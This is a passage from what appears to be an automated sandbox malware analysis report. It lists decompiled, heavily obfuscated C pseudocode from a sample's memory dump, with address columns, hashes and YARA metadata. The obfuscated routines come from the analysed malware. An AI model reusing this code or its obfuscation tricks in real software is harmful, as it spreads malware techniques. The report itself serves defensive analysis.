                                                                                                                      							_t435 = E003545CD(_v192,  &_v76,  &_v84);
                                                                                                                      							asm("sbb ecx, ecx");
                                                                                                                      							_t448 = ( ~_t435 & 0xfac85eed) + 0xa894c28;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t448 == 0x44ef61d) {
                                                                                                                      							E003468DE(_v232, _v208, _v240, _v100, _v84);
                                                                                                                      							_t515 = _t515 + 0xc;
                                                                                                                      							_t448 = 0xa894c28;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t448 != 0x551ab15) {
                                                                                                                      							goto L28;
                                                                                                                      						}
                                                                                                                      						_t513 = E0034EF71(_v164, _v156);
                                                                                                                      						_t448 = 0xb847f8c;
                                                                                                                      						 *((intOrPtr*)(_t446 + 4)) = _v140 + _v80 + _t513;
                                                                                                                      					}
                                                                                                                      					if(_t448 == 0xa894c28) {
                                                                                                                      						E003468DE(_v152, _v180, _v160, _v188, _v76);
                                                                                                                      						_t515 = _t515 + 0xc;
                                                                                                                      						_t448 = 0x47d0478;
                                                                                                                      						goto L28;
                                                                                                                      					}
                                                                                                                      					if(_t448 == 0xb847f8c) {
                                                                                                                      						_push(_t448);
                                                                                                                      						_push(_t448);
                                                                                                                      						_t419 = E00353512( *((intOrPtr*)(_t446 + 4)));
                                                                                                                      						 *_t446 = _t419;
                                                                                                                      						if(_t419 == 0) {
                                                                                                                      							_t448 = 0x44ef61d;
                                                                                                                      						} else {
                                                                                                                      							_t448 = 0x5a88f65;
                                                                                                                      							_t499 = 1;
                                                                                                                      							_v92 = 1;
                                                                                                                      						}
                                                                                                                      						goto L1;
                                                                                                                      					}
                                                                                                                      					if(_t448 == 0xe73b6d2) {
                                                                                                                      						_v48 = _v88;
                                                                                                                      						_v52 = 0x20;
                                                                                                                      						_v56 =  &_v32;
                                                                                                                      						_v64 =  *_t498;
                                                                                                                      						_v60 =  *((intOrPtr*)(_t498 + 4));
                                                                                                                      						_t424 = E0035FF31( &_v76,  &_v68, _v144, _v196, _v204);
                                                                                                                      						_t515 = _t515 + 0xc;
                                                                                                                      						if(_t424 == 0) {
                                                                                                                      							break;
                                                                                                                      						}
                                                                                                                      						_t448 = 0x231aa40;
                                                                                                                      						goto L1;
                                                                                                                      					}
                                                                                                                      					if(_t448 != 0xf32de15) {
                                                                                                                      						goto L28;
                                                                                                                      					}
                                                                                                                      					_push( *_t498);
                                                                                                                      					_t444 = E00351831(_v212, _v220,  &_v32, _v96, _t448,  *((intOrPtr*)(_t498 + 4)));
                                                                                                                      					_t515 = _t515 + 0x18;
                                                                                                                      					if(_t444 == 0) {
                                                                                                                      						break;
                                                                                                                      					}
                                                                                                                      					_t448 = 0xe73b6d2;
                                                                                                                      					goto L1;
                                                                                                                      					L28:
                                                                                                                      				} while (_t448 != 0x47d0478);
                                                                                                                      				return _t499;
                                                                                                                      			}
















































































                                                                                                                      0x003423ea
                                                                                                                      0x003423f2
                                                                                                                      0x003423fa
                                                                                                                      0x003423fe
                                                                                                                      0x00342406
                                                                                                                      0x0034240e
                                                                                                                      0x0034241b
                                                                                                                      0x0034241e
                                                                                                                      0x00342422
                                                                                                                      0x00342427
                                                                                                                      0x0034242f
                                                                                                                      0x00342437
                                                                                                                      0x00342444
                                                                                                                      0x00342448
                                                                                                                      0x00342450
                                                                                                                      0x00342458
                                                                                                                      0x00342463
                                                                                                                      0x0034246e
                                                                                                                      0x00342479
                                                                                                                      0x00342481
                                                                                                                      0x0034248e
                                                                                                                      0x00342492
                                                                                                                      0x0034249a
                                                                                                                      0x003424a2
                                                                                                                      0x003424ae
                                                                                                                      0x003424b3
                                                                                                                      0x003424b9
                                                                                                                      0x003424be
                                                                                                                      0x003424c6
                                                                                                                      0x003424d2
                                                                                                                      0x003424d5
                                                                                                                      0x003424dc
                                                                                                                      0x003424e0
                                                                                                                      0x003424e5
                                                                                                                      0x003424ed
                                                                                                                      0x003424f5
                                                                                                                      0x003424ff
                                                                                                                      0x00342508
                                                                                                                      0x0034250c
                                                                                                                      0x00342514
                                                                                                                      0x0034251c
                                                                                                                      0x00342526
                                                                                                                      0x0034252a
                                                                                                                      0x00342532
                                                                                                                      0x0034253a
                                                                                                                      0x0034253f
                                                                                                                      0x00342547
                                                                                                                      0x00342547
                                                                                                                      0x0034254f
                                                                                                                      0x0034254f
                                                                                                                      0x0034254f
                                                                                                                      0x0034254f
                                                                                                                      0x00342555
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0034255b
                                                                                                                      0x0034262b
                                                                                                                      0x00342644
                                                                                                                      0x00342653
                                                                                                                      0x0034266c
                                                                                                                      0x00342671
                                                                                                                      0x0034267d
                                                                                                                      0x00342681
                                                                                                                      0x00342689
                                                                                                                      0x0034268a
                                                                                                                      0x0034268f
                                                                                                                      0x00342692
                                                                                                                      0x00342695
                                                                                                                      0x00342699
                                                                                                                      0x003426ac
                                                                                                                      0x003426bb
                                                                                                                      0x003426c2
                                                                                                                      0x003426c7
                                                                                                                      0x003426cb
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0034269b
                                                                                                                      0x0034269b
                                                                                                                      0x003426a2
                                                                                                                      0x003426a4
                                                                                                                      0x003426a4
                                                                                                                      0x003426a7
                                                                                                                      0x003426a8
                                                                                                                      0x00000000
                                                                                                                      0x0034269b
                                                                                                                      0x00342567
                                                                                                                      0x00342621
                                                                                                                      0x00000000
                                                                                                                      0x00342621
                                                                                                                      0x00342573
                                                                                                                      0x00342603
                                                                                                                      0x0034260e
                                                                                                                      0x00342616
                                                                                                                      0x00000000
                                                                                                                      0x00342616
                                                                                                                      0x0034257b
                                                                                                                      0x003425d9
                                                                                                                      0x003425de
                                                                                                                      0x003425e1
                                                                                                                      0x00000000
                                                                                                                      0x003425e1
                                                                                                                      0x00342583
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x003425a1
                                                                                                                      0x003425b5
                                                                                                                      0x003425ba
                                                                                                                      0x003425ba
                                                                                                                      0x003426dd
                                                                                                                      0x0034280a
                                                                                                                      0x0034280f
                                                                                                                      0x00342812
                                                                                                                      0x00000000
                                                                                                                      0x00342812
                                                                                                                      0x003426e9
                                                                                                                      0x003427c3
                                                                                                                      0x003427c4
                                                                                                                      0x003427c8
                                                                                                                      0x003427cd
                                                                                                                      0x003427d3
                                                                                                                      0x003427e9
                                                                                                                      0x003427d5
                                                                                                                      0x003427d7
                                                                                                                      0x003427dc
                                                                                                                      0x003427dd
                                                                                                                      0x003427dd
                                                                                                                      0x00000000
                                                                                                                      0x003427d3
                                                                                                                      0x003426f5
                                                                                                                      0x00342757
                                                                                                                      0x00342773
                                                                                                                      0x0034277e
                                                                                                                      0x00342787
                                                                                                                      0x00342791
                                                                                                                      0x00342798
                                                                                                                      0x0034279d
                                                                                                                      0x003427a2
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x003427a4
                                                                                                                      0x00000000
                                                                                                                      0x003427a4
                                                                                                                      0x003426fd
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00342703
                                                                                                                      0x00342727
                                                                                                                      0x0034272c
                                                                                                                      0x00342731
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00342737
                                                                                                                      0x00000000
                                                                                                                      0x00342817
                                                                                                                      0x00342817
                                                                                                                      0x0034282f

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $+E,$f,$E
                                                                                                                      • API String ID: 0-1056989491
                                                                                                                      • Opcode ID: f924d05836e70ef0a09e8ac1d4695ea004385d1c302f03348df483147d80d69e
                                                                                                                      • Instruction ID: a80c6eee7baa11cb4b0c361aa91747c44c6535b2f21172593d41a70e89feebff
                                                                                                                      • Opcode Fuzzy Hash: f924d05836e70ef0a09e8ac1d4695ea004385d1c302f03348df483147d80d69e
                                                                                                                      • Instruction Fuzzy Hash: CB224F715083808FD369CF26C58AA5BFBE1FBC5708F50891DF6998A260D7B1A949CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E0035CC89(intOrPtr* __edx, intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                      				char _v8;
                                                                                                                      				intOrPtr _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				void* __ecx;
                                                                                                                      				void* _t283;
                                                                                                                      				intOrPtr _t315;
                                                                                                                      				void* _t316;
                                                                                                                      				intOrPtr _t320;
                                                                                                                      				intOrPtr _t324;
                                                                                                                      				void* _t325;
                                                                                                                      				intOrPtr* _t328;
                                                                                                                      				void* _t330;
                                                                                                                      				void* _t365;
                                                                                                                      				signed int _t368;
                                                                                                                      				signed int _t369;
                                                                                                                      				signed int _t370;
                                                                                                                      				signed int _t371;
                                                                                                                      				signed int _t372;
                                                                                                                      				signed int _t373;
                                                                                                                      				signed int _t374;
                                                                                                                      				signed int _t375;
                                                                                                                      				signed int _t376;
                                                                                                                      				signed int _t377;
                                                                                                                      				signed int _t378;
                                                                                                                      				signed int* _t381;
                                                                                                                      
                                                                                                                      				_t367 = _a4;
                                                                                                                      				_t328 = __edx;
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				E0034CF25(_t283);
                                                                                                                      				_v60 = 0x688185;
                                                                                                                      				_t381 =  &(( &_v116)[4]);
                                                                                                                      				_v60 = _v60 ^ 0x6a5ee641;
                                                                                                                      				_t6 =  &_v60; // 0x6a5ee641
                                                                                                                      				_t365 = 0;
                                                                                                                      				_t330 = 0xb7d839b;
                                                                                                                      				_t368 = 0x77;
                                                                                                                      				_v60 =  *_t6 * 0x53;
                                                                                                                      				_v60 = _v60 ^ 0x6fa3a48d;
                                                                                                                      				_v36 = 0x2ce9a9;
                                                                                                                      				_v36 = _v36 / _t368;
                                                                                                                      				_v36 = _v36 ^ 0x0000609f;
                                                                                                                      				_v72 = 0x8d05d4;
                                                                                                                      				_v72 = _v72 + 0xfffff9ae;
                                                                                                                      				_v72 = _v72 + 0xfffffb99;
                                                                                                                      				_v72 = _v72 + 0xffff1821;
                                                                                                                      				_v72 = _v72 ^ 0x008c133c;
                                                                                                                      				_v84 = 0xdf93a7;
                                                                                                                      				_v84 = _v84 + 0x158a;
                                                                                                                      				_v84 = _v84 | 0xa6edaf65;
                                                                                                                      				_v84 = _v84 ^ 0xa6ffaf75;
                                                                                                                      				_v16 = 0x181fb2;
                                                                                                                      				_v16 = _v16 >> 0xb;
                                                                                                                      				_v16 = _v16 ^ 0x00000303;
                                                                                                                      				_v40 = 0xf7fe46;
                                                                                                                      				_v40 = _v40 >> 4;
                                                                                                                      				_v40 = _v40 ^ 0x000f7fe4;
                                                                                                                      				_v96 = 0x7307ab;
                                                                                                                      				_v96 = _v96 + 0xffff98a0;
                                                                                                                      				_v96 = _v96 ^ 0x207b23a6;
                                                                                                                      				_t369 = 7;
                                                                                                                      				_v96 = _v96 / _t369;
                                                                                                                      				_v96 = _v96 ^ 0x0493a521;
                                                                                                                      				_v68 = 0xb0f7c2;
                                                                                                                      				_v68 = _v68 + 0xa001;
                                                                                                                      				_v68 = _v68 + 0xf927;
                                                                                                                      				_t370 = 0x1b;
                                                                                                                      				_v68 = _v68 / _t370;
                                                                                                                      				_v68 = _v68 ^ 0x0001298b;
                                                                                                                      				_v20 = 0x9a8fe8;
                                                                                                                      				_v20 = _v20 >> 0xb;
                                                                                                                      				_v20 = _v20 ^ 0x0008eae3;
                                                                                                                      				_v76 = 0xc447f;
                                                                                                                      				_v76 = _v76 << 2;
                                                                                                                      				_v76 = _v76 ^ 0x6da7c905;
                                                                                                                      				_v76 = _v76 | 0x8e440162;
                                                                                                                      				_v76 = _v76 ^ 0xefde5c32;
                                                                                                                      				_v80 = 0xe5293a;
                                                                                                                      				_v80 = _v80 ^ 0x7ea2fbd4;
                                                                                                                      				_v80 = _v80 << 6;
                                                                                                                      				_v80 = _v80 >> 0x10;
                                                                                                                      				_v80 = _v80 ^ 0x000bb464;
                                                                                                                      				_v24 = 0xaea513;
                                                                                                                      				_v24 = _v24 ^ 0xb7e1a43c;
                                                                                                                      				_v24 = _v24 ^ 0xb74b462d;
                                                                                                                      				_v28 = 0x6b2191;
                                                                                                                      				_v28 = _v28 | 0x9c0eb3e2;
                                                                                                                      				_v28 = _v28 ^ 0x9c639c10;
                                                                                                                      				_v32 = 0x4e8823;
                                                                                                                      				_t371 = 0xe;
                                                                                                                      				_v32 = _v32 / _t371;
                                                                                                                      				_v32 = _v32 ^ 0x000823cf;
                                                                                                                      				_v88 = 0x8b37c7;
                                                                                                                      				_v88 = _v88 + 0x96e4;
                                                                                                                      				_t372 = 0x63;
                                                                                                                      				_v88 = _v88 / _t372;
                                                                                                                      				_t373 = 0x18;
                                                                                                                      				_v88 = _v88 / _t373;
                                                                                                                      				_v88 = _v88 ^ 0x000cd8d0;
                                                                                                                      				_v92 = 0x8ccaf;
                                                                                                                      				_v92 = _v92 + 0xffff7c77;
                                                                                                                      				_v92 = _v92 >> 7;
                                                                                                                      				_t374 = 0x1a;
                                                                                                                      				_v92 = _v92 * 0x4a;
                                                                                                                      				_v92 = _v92 ^ 0x000ee576;
                                                                                                                      				_v100 = 0x6d8220;
                                                                                                                      				_v100 = _v100 + 0xffffba59;
                                                                                                                      				_v100 = _v100 / _t374;
                                                                                                                      				_v100 = _v100 + 0x20d5;
                                                                                                                      				_v100 = _v100 ^ 0x000e9a10;
                                                                                                                      				_v104 = 0xccaba6;
                                                                                                                      				_t375 = 0x29;
                                                                                                                      				_v104 = _v104 / _t375;
                                                                                                                      				_t376 = 0x69;
                                                                                                                      				_v104 = _v104 / _t376;
                                                                                                                      				_v104 = _v104 + 0xffff1a57;
                                                                                                                      				_v104 = _v104 ^ 0xfff2229f;
                                                                                                                      				_v44 = 0x73a08b;
                                                                                                                      				_v44 = _v44 / _t376;
                                                                                                                      				_v44 = _v44 ^ 0x0004e5c5;
                                                                                                                      				_v108 = 0xb1e3bd;
                                                                                                                      				_v108 = _v108 ^ 0x0f8130c9;
                                                                                                                      				_v108 = _v108 + 0x5ac4;
                                                                                                                      				_t377 = 0x21;
                                                                                                                      				_v108 = _v108 / _t377;
                                                                                                                      				_v108 = _v108 ^ 0x0077ef5a;
                                                                                                                      				_v112 = 0x4cec76;
                                                                                                                      				_t192 =  &_v112; // 0x4cec76
                                                                                                                      				_v112 =  *_t192 * 0x1a;
                                                                                                                      				_v112 = _v112 + 0xdd93;
                                                                                                                      				_v112 = _v112 << 6;
                                                                                                                      				_v112 = _v112 ^ 0xf432eb29;
                                                                                                                      				_v116 = 0x879801;
                                                                                                                      				_v116 = _v116 + 0x9229;
                                                                                                                      				_v116 = _v116 << 3;
                                                                                                                      				_v116 = _v116 | 0xee96daec;
                                                                                                                      				_v116 = _v116 ^ 0xeed13984;
                                                                                                                      				_v64 = 0x9b79ce;
                                                                                                                      				_v64 = _v64 >> 0xe;
                                                                                                                      				_t378 = 0x5f;
                                                                                                                      				_v64 = _v64 * 0x1e;
                                                                                                                      				_v64 = _v64 | 0xf7dc9e8a;
                                                                                                                      				_v64 = _v64 ^ 0xf7d2a70d;
                                                                                                                      				_v48 = 0x898fb;
                                                                                                                      				_v48 = _v48 << 0xa;
                                                                                                                      				_v48 = _v48 * 0x4f;
                                                                                                                      				_v48 = _v48 ^ 0x9cd9bf24;
                                                                                                                      				_v52 = 0xd43737;
                                                                                                                      				_v52 = _v52 << 9;
                                                                                                                      				_v52 = _v52 / _t378;
                                                                                                                      				_v52 = _v52 ^ 0x01c68cd1;
                                                                                                                      				_v56 = 0x1c405f;
                                                                                                                      				_v56 = _v56 >> 0xa;
                                                                                                                      				_v56 = _v56 | 0xb1ef7bec;
                                                                                                                      				_v56 = _v56 ^ 0xb1edddf2;
                                                                                                                      				do {
                                                                                                                      					while(_t330 != 0x6ea4fc1) {
                                                                                                                      						if(_t330 == 0x7f0f713) {
                                                                                                                      							_push(_t330);
                                                                                                                      							_push(_t330);
                                                                                                                      							_t320 = E00353512(_v8);
                                                                                                                      							_v12 = _t320;
                                                                                                                      							if(_t320 != 0) {
                                                                                                                      								_t330 = 0xa80f622;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							if(_t330 == 0x7f61550) {
                                                                                                                      								E003468DE(_v64, _v48, _v52, _v56, _v12);
                                                                                                                      							} else {
                                                                                                                      								if(_t330 == 0xa80f622) {
                                                                                                                      									_t324 =  *0x365c9c; // 0x0
                                                                                                                      									_t325 = E0034B335(_v100,  *_t367, _v104,  *((intOrPtr*)(_t324 + 0x50)), _v36, _t330, _v40,  &_v8, _v44,  *((intOrPtr*)(_t367 + 4)), _v108, _v112, _v12, _v116, _t330, _v8);
                                                                                                                      									_t381 =  &(_t381[0xe]);
                                                                                                                      									if(_t325 == _v96) {
                                                                                                                      										 *_t328 = _v12;
                                                                                                                      										_t365 = 1;
                                                                                                                      										 *((intOrPtr*)(_t328 + 4)) = _v8;
                                                                                                                      									} else {
                                                                                                                      										_t330 = 0x7f61550;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									if(_t330 != 0xb7d839b) {
                                                                                                                      										goto L14;
                                                                                                                      									} else {
                                                                                                                      										_t330 = 0x6ea4fc1;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L18:
                                                                                                                      						return _t365;
                                                                                                                      					}
                                                                                                                      					_t315 =  *0x365c9c; // 0x0
                                                                                                                      					_t316 = E0034B335(_v68,  *_t367, _v20,  *((intOrPtr*)(_t315 + 0x50)), _v60, _t330, _v72,  &_v8, _v76,  *((intOrPtr*)(_t367 + 4)), _v80, _v24, _t365, _v28, _t330, _v84);
                                                                                                                      					_t381 =  &(_t381[0xe]);
                                                                                                                      					if(_t316 != _v16) {
                                                                                                                      						_t330 = 0x33d9eeb;
                                                                                                                      						goto L14;
                                                                                                                      					} else {
                                                                                                                      						_t330 = 0x7f0f713;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					goto L18;
                                                                                                                      					L14:
                                                                                                                      				} while (_t330 != 0x33d9eeb);
                                                                                                                      				goto L18;
                                                                                                                      			}





















































                                                                                                                      0x0035cde4
                                                                                                                      0x0035cdec
                                                                                                                      0x0035cdf4
                                                                                                                      0x0035cdfc
                                                                                                                      0x0035ce04
                                                                                                                      0x0035ce0c
                                                                                                                      0x0035ce11
                                                                                                                      0x0035ce16
                                                                                                                      0x0035ce1e
                                                                                                                      0x0035ce26
                                                                                                                      0x0035ce2e
                                                                                                                      0x0035ce36
                                                                                                                      0x0035ce3e
                                                                                                                      0x0035ce46
                                                                                                                      0x0035ce4e
                                                                                                                      0x0035ce5e
                                                                                                                      0x0035ce63
                                                                                                                      0x0035ce67
                                                                                                                      0x0035ce6f
                                                                                                                      0x0035ce77
                                                                                                                      0x0035ce85
                                                                                                                      0x0035ce8a
                                                                                                                      0x0035ce94
                                                                                                                      0x0035ce99
                                                                                                                      0x0035ce9d
                                                                                                                      0x0035cea5
                                                                                                                      0x0035cead
                                                                                                                      0x0035ceb5
                                                                                                                      0x0035cec1
                                                                                                                      0x0035cec4
                                                                                                                      0x0035cec8
                                                                                                                      0x0035ced0
                                                                                                                      0x0035ced8
                                                                                                                      0x0035cee8
                                                                                                                      0x0035ceec
                                                                                                                      0x0035cef4
                                                                                                                      0x0035cefc
                                                                                                                      0x0035cf08
                                                                                                                      0x0035cf0d
                                                                                                                      0x0035cf17
                                                                                                                      0x0035cf1c
                                                                                                                      0x0035cf20
                                                                                                                      0x0035cf28
                                                                                                                      0x0035cf30
                                                                                                                      0x0035cf40
                                                                                                                      0x0035cf46
                                                                                                                      0x0035cf4e
                                                                                                                      0x0035cf56
                                                                                                                      0x0035cf5e
                                                                                                                      0x0035cf6a
                                                                                                                      0x0035cf6d
                                                                                                                      0x0035cf71
                                                                                                                      0x0035cf79
                                                                                                                      0x0035cf81
                                                                                                                      0x0035cf86
                                                                                                                      0x0035cf8a
                                                                                                                      0x0035cf92
                                                                                                                      0x0035cf97
                                                                                                                      0x0035cf9f
                                                                                                                      0x0035cfa7
                                                                                                                      0x0035cfaf
                                                                                                                      0x0035cfb4
                                                                                                                      0x0035cfbc
                                                                                                                      0x0035cfc4
                                                                                                                      0x0035cfce
                                                                                                                      0x0035cfda
                                                                                                                      0x0035cfdb
                                                                                                                      0x0035cfdf
                                                                                                                      0x0035cfe7
                                                                                                                      0x0035cfef
                                                                                                                      0x0035cff7
                                                                                                                      0x0035d001
                                                                                                                      0x0035d005
                                                                                                                      0x0035d00d
                                                                                                                      0x0035d015
                                                                                                                      0x0035d025
                                                                                                                      0x0035d029
                                                                                                                      0x0035d031
                                                                                                                      0x0035d039
                                                                                                                      0x0035d03e
                                                                                                                      0x0035d046
                                                                                                                      0x0035d04e
                                                                                                                      0x0035d04e
                                                                                                                      0x0035d05c
                                                                                                                      0x0035d0f6
                                                                                                                      0x0035d0f7
                                                                                                                      0x0035d0ff
                                                                                                                      0x0035d104
                                                                                                                      0x0035d10f
                                                                                                                      0x0035d115
                                                                                                                      0x00000000
                                                                                                                      0x0035d115
                                                                                                                      0x0035d062
                                                                                                                      0x0035d068
                                                                                                                      0x0035d1af
                                                                                                                      0x0035d06e
                                                                                                                      0x0035d074
                                                                                                                      0x0035d0bc
                                                                                                                      0x0035d0ce
                                                                                                                      0x0035d0d3
                                                                                                                      0x0035d0da
                                                                                                                      0x0035d18f
                                                                                                                      0x0035d191
                                                                                                                      0x0035d196
                                                                                                                      0x0035d0e0
                                                                                                                      0x0035d0e0
                                                                                                                      0x00000000
                                                                                                                      0x0035d0e0
                                                                                                                      0x0035d076
                                                                                                                      0x0035d07c
                                                                                                                      0x00000000
                                                                                                                      0x0035d082
                                                                                                                      0x0035d082
                                                                                                                      0x00000000
                                                                                                                      0x0035d082
                                                                                                                      0x0035d07c
                                                                                                                      0x0035d074
                                                                                                                      0x0035d068
                                                                                                                      0x0035d1b7
                                                                                                                      0x0035d1c0
                                                                                                                      0x0035d1c0
                                                                                                                      0x0035d149
                                                                                                                      0x0035d15e
                                                                                                                      0x0035d163
                                                                                                                      0x0035d16a
                                                                                                                      0x0035d176
                                                                                                                      0x00000000
                                                                                                                      0x0035d16c
                                                                                                                      0x0035d16c
                                                                                                                      0x00000000
                                                                                                                      0x0035d16c
                                                                                                                      0x00000000
                                                                                                                      0x0035d17b
                                                                                                                      0x0035d17b
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: :)$A^j$Zw$vL
                                                                                                                      • API String ID: 0-3297297485
                                                                                                                      • Opcode ID: a028a464876d9dfaab94ff48c6aafa205fc57f9bdf1035d701871a6ce204ab31
                                                                                                                      • Instruction ID: 7bfeb177cc9d25e837645132de43434809be0a478d279481b816277c230c2998
                                                                                                                      • Opcode Fuzzy Hash: a028a464876d9dfaab94ff48c6aafa205fc57f9bdf1035d701871a6ce204ab31
                                                                                                                      • Instruction Fuzzy Hash: 99D120B21083819FD764CF66C94991BFBE1FBC4748F10891DF6968A260C7B69949CF03
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E0034C309() {
                                                                                                                      				char _v524;
                                                                                                                      				signed int _v528;
                                                                                                                      				intOrPtr _v532;
                                                                                                                      				signed int _v536;
                                                                                                                      				signed int _v540;
                                                                                                                      				signed int _v544;
                                                                                                                      				signed int _v548;
                                                                                                                      				signed int _v552;
                                                                                                                      				signed int _v556;
                                                                                                                      				signed int _v560;
                                                                                                                      				signed int _v564;
                                                                                                                      				signed int _v568;
                                                                                                                      				signed int _v572;
                                                                                                                      				signed int _v576;
                                                                                                                      				signed int _v580;
                                                                                                                      				signed int _v584;
                                                                                                                      				signed int _v588;
                                                                                                                      				signed int _v592;
                                                                                                                      				signed int _v596;
                                                                                                                      				signed int _v600;
                                                                                                                      				signed int _v604;
                                                                                                                      				signed int _t177;
                                                                                                                      				void* _t180;
                                                                                                                      				void* _t183;
                                                                                                                      				intOrPtr _t190;
                                                                                                                      				intOrPtr _t192;
                                                                                                                      				signed int _t208;
                                                                                                                      				signed int _t209;
                                                                                                                      				signed int _t210;
                                                                                                                      				signed int* _t213;
                                                                                                                      
                                                                                                                      				_t213 =  &_v604;
                                                                                                                      				_v528 = _v528 & 0x00000000;
                                                                                                                      				_v532 = 0xe4831e;
                                                                                                                      				_t183 = 0x6eb28ed;
                                                                                                                      				_v552 = 0x1276c3;
                                                                                                                      				_v552 = _v552 ^ 0x42b4d72c;
                                                                                                                      				_v552 = _v552 + 0xf95f;
                                                                                                                      				_v552 = _v552 ^ 0x42a4cd0b;
                                                                                                                      				_v548 = 0x347a6a;
                                                                                                                      				_v548 = _v548 | 0x3256b11b;
                                                                                                                      				_v548 = _v548 ^ 0x3277037e;
                                                                                                                      				_v564 = 0x82dd46;
                                                                                                                      				_v564 = _v564 + 0xffffb28a;
                                                                                                                      				_v564 = _v564 << 0xf;
                                                                                                                      				_v564 = _v564 ^ 0x47e00e04;
                                                                                                                      				_v600 = 0xaa25ff;
                                                                                                                      				_v600 = _v600 << 0xd;
                                                                                                                      				_v600 = _v600 + 0xf5f3;
                                                                                                                      				_v600 = _v600 + 0xffff8f6c;
                                                                                                                      				_v600 = _v600 ^ 0x44cc5d5c;
                                                                                                                      				_v556 = 0x1132ac;
                                                                                                                      				_v556 = _v556 | 0x9b4d5b2d;
                                                                                                                      				_v556 = _v556 ^ 0x2eadc533;
                                                                                                                      				_v556 = _v556 ^ 0xb5fd7d8d;
                                                                                                                      				_v536 = 0x11628e;
                                                                                                                      				_v536 = _v536 * 0x4b;
                                                                                                                      				_v536 = _v536 ^ 0x051afcb6;
                                                                                                                      				_v584 = 0xa15265;
                                                                                                                      				_v584 = _v584 << 9;
                                                                                                                      				_t208 = 0x76;
                                                                                                                      				_v584 = _v584 / _t208;
                                                                                                                      				_t209 = 0x44;
                                                                                                                      				_v584 = _v584 * 0x30;
                                                                                                                      				_v584 = _v584 ^ 0x1b1be586;
                                                                                                                      				_v576 = 0xad5a3e;
                                                                                                                      				_v576 = _v576 | 0x6c06410f;
                                                                                                                      				_v576 = _v576 * 0xe;
                                                                                                                      				_v576 = _v576 ^ 0xf19bc2b8;
                                                                                                                      				_v540 = 0x7faa4f;
                                                                                                                      				_v540 = _v540 + 0xffff807e;
                                                                                                                      				_v540 = _v540 ^ 0x007d47f3;
                                                                                                                      				_v544 = 0x15cbe5;
                                                                                                                      				_v544 = _v544 | 0x222269e9;
                                                                                                                      				_v544 = _v544 ^ 0x2236b88c;
                                                                                                                      				_v592 = 0x7f48ca;
                                                                                                                      				_v592 = _v592 << 3;
                                                                                                                      				_v592 = _v592 / _t209;
                                                                                                                      				_v592 = _v592 | 0x6974e558;
                                                                                                                      				_v592 = _v592 ^ 0x697a9c68;
                                                                                                                      				_v568 = 0xdf464;
                                                                                                                      				_v568 = _v568 << 0xf;
                                                                                                                      				_v568 = _v568 | 0x68444ee0;
                                                                                                                      				_v568 = _v568 ^ 0xfa71a6c1;
                                                                                                                      				_v588 = 0x4eabc7;
                                                                                                                      				_v588 = _v588 >> 4;
                                                                                                                      				_v588 = _v588 ^ 0xdf4d904b;
                                                                                                                      				_v588 = _v588 + 0x3b02;
                                                                                                                      				_v588 = _v588 ^ 0xdf416162;
                                                                                                                      				_v596 = 0x2da8e3;
                                                                                                                      				_v596 = _v596 | 0xcaed8666;
                                                                                                                      				_v596 = _v596 + 0xffff0300;
